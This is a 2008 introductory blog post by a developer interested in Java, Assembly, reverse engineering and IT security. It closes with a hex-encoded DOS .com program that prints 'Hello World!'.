2008-01-05T19:50:00.000Z

As a new year's resolution I decided it was about time to make my research available on a global basis. This blog will focus around my core skills and interests in software development (mostly Java and Assembly), reverse engineering and other aspects surrounding IT security, such as "in the wild" hacking techniques. I look forward to all feedback, now let's get down and dirty and have some phun. Of course the first blog post always has to finish with the classic message

BA0C01B409CD21B44CCD210048656C6C6F20576F726C64210D0A24
(Copy and paste into hex editor and save as a .com file)

Cheers

Adam
http://www.linkedin.com/profile?viewProfile=&key=12090735